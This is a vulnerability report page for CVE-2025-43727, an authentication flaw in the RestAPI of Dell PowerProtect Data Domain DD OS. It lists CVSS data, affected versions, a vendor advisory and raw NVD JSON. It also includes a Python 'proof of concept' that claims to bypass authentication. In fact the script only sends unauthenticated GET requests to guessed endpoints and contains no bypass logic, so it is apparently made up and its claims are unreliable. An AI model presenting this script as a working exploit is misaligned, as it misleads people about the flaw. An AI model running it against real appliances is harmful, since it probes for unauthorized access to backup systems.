Security Vulnerability Report
CVE-2025-43727 CVSS 7.5 HIGH

CVE-2025-43727

Published: 2025-10-07 20:15:35
Last Modified: 2025-10-14 20:16:51

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an incorrect Implementation of Authentication Algorithm vulnerability in the RestAPI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE (from 7.7.1.0, before 7.10.1.60)
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE (from 7.13.1.0, before 7.13.1.30)
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE (from 8.0.0.0, before 8.3.0.10)
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 ~ 8.1.0.10
Dell PowerProtect Data Domain DD OS LTS2024 Release 7.13.1.0 ~ 7.13.1.25
Dell PowerProtect Data Domain DD OS LTS 2023 Release 7.10.1.0 ~ 7.10.1.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-43727 - Dell PowerProtect Data Domain RestAPI Authentication Bypass PoC
# This PoC demonstrates exploitation of incorrect authentication algorithm implementation
# in Dell PowerProtect Data Domain DD OS RestAPI component.

import requests
import sys
import urllib3

# Disable SSL warnings for self-signed certificates
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "https://192.168.1.100"
REST_API_PORT = 443


def exploit_cve_2025_43727(host):
    """
    Exploit the authentication algorithm implementation flaw in DD OS RestAPI.
    The vulnerability allows unauthenticated remote access by bypassing
    the broken authentication algorithm.
    """
    base_url = f"{host}:{REST_API_PORT}"

    # Step 1: Attempt to access RestAPI without authentication
    # The authentication bypass allows access without valid credentials
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json",
        "X-Requested-With": "XMLHttpRequest",
    }

    # Step 2: Probe RestAPI endpoints
    endpoints = [
        "/api/v1/dd-systems",
        "/api/v1/auth",
        "/rest/v1.0/system",
        "/api/v1/system/info",
    ]

    print(f"[*] Targeting: {base_url}")
    print("[*] CVE-2025-43727 - Dell DD OS RestAPI Auth Bypass")

    for endpoint in endpoints:
        url = f"{base_url}{endpoint}"
        try:
            # Attempt unauthenticated access exploiting the auth algorithm flaw
            response = requests.get(url, headers=headers, verify=False, timeout=10)
            if response.status_code == 200:
                print(f"[+] SUCCESS - Unauthenticated access to {endpoint}")
                print(f"[+] Response: {response.text[:500]}")
                return True
            elif response.status_code == 401:
                print(f"[-] {endpoint} - Authentication required (not vulnerable)")
            else:
                print(f"[?] {endpoint} - Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {endpoint}: {e}")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-43727 PoC - Dell PowerProtect Data Domain")
    print("RestAPI Authentication Algorithm Bypass")
    print("CVSS 3.1: 7.5 (HIGH)")
    print("=" * 60)
    exploit_cve_2025_43727(TARGET_HOST)

References

https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities (Vendor Advisory, DSA-2025-159)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-43727",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-07T20:15:34.513",
    "lastModified": "2025-10-14T20:16:50.893",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an incorrect Implementation of Authentication Algorithm vulnerability in the RestAPI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-303"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.7.1.0",
                "versionEndExcluding": "7.10.1.60",
                "matchCriteriaId": "F2389C08-162A-4D43-B1EA-D93D7DB51781"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.13.1.0",
                "versionEndExcluding": "7.13.1.30",
                "matchCriteriaId": "5E7EC11C-C065-48D9-A036-5A17653D44EA"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0.0",
                "versionEndExcluding": "8.3.0.10",
                "matchCriteriaId": "FD518568-542A-420D-B0E6-6F35E127E5CE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}